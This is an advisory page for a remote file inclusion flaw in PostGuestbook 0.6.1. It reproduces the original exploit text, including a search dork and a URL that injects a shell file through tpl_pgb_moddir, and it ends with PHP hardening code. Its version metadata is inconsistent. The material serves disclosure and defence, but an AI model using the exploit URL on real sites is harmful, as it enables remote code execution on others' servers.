Vendor: PostGuestbook
By: GloD_M = [Mahmood_ali]
CVSS: 5.5 (MEDIUM)
CWE: Remote File Inclusion
Product Name: PostGuestbook
Affected Version From: 2000.6.1
Affected Version To: 2000.6.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

PostGuestbook 0.6.1 (tpl_pgb_moddir) Remote File Include Exploit

This exploit takes advantage of a remote file inclusion vulnerability in PostGuestbook version 0.6.1. The 'tpl_pgb_moddir' variable is used unvalidated to build an include path, so by setting it in the URL an attacker can make the script include a malicious file (in this case, 'Shell.php') and execute arbitrary code on the target system.

Mitigation:

The recommended mitigation for this vulnerability is to update to a patched version of PostGuestbook or to disable the affected module.
Source

Exploit-DB raw data:

# PostGuestbook 0.6.1 (tpl_pgb_moddir) Remote File Include Exploit
# D.Script: http://sourceforge.net/projects/postguestbook/
# Dork: "Powered by: PostGuestbook 0.6.1"
# Discovered by GloD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# V.Code
# include "$tpl_pgb_moddir/styles/$tpl_style/error.php";
# Exploit:
# [VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=Shell.php?

# milw0rm.com [2007-03-07]
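
One way to harden the include quoted under V.Code above, as an added example that is not PostGuestbook's own code. It assumes PHP 7.1+, that the file sits in the module root next to styles/, and that 'tpl_style' arrives as a request parameter; PGB_MODDIR and pgb_template_path() are hypothetical names.

```php
<?php
// Added example, not PostGuestbook code. Vulnerable pattern from the advisory:
//   include "$tpl_pgb_moddir/styles/$tpl_style/error.php";
// Both variables become attacker-controlled when request parameters are
// imported into global scope (assumption: e.g. register_globals on old PHP).

// The module directory is fixed server-side and never read from the request.
// Assumption: this file lives in the module root, next to styles/.
define('PGB_MODDIR', __DIR__);

/**
 * Resolve a template file inside styles/<style>/, or return null.
 * $style and $file are treated as untrusted input.
 */
function pgb_template_path(string $style, string $file, string $moddir = PGB_MODDIR): ?string
{
    // Plain identifiers only: no path separators, "..", URL schemes or NUL bytes.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $style)) {
        return null;
    }
    if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\.php\z/', $file)) {
        return null;
    }

    $base = realpath($moddir . '/styles');
    $path = realpath($moddir . '/styles/' . $style . '/' . $file);
    if ($base === false || $path === false) {
        return null; // missing directory or file
    }

    // Defence in depth: the resolved path must stay under styles/
    // (catches symlinks that point outside the module).
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Usage: validate the requested style, fall back to the bundled "internal" style.
$style = isset($_GET['tpl_style']) ? (string) $_GET['tpl_style'] : 'internal';
$path  = pgb_template_path($style, 'error.php')
      ?? pgb_template_path('internal', 'error.php');
if ($path === null) {
    http_response_code(500);
    exit('Template not found.');
}
include $path;
```

Keeping allow_url_include = Off in php.ini adds a second layer, since include then refuses URL wrappers even if a path check is missed.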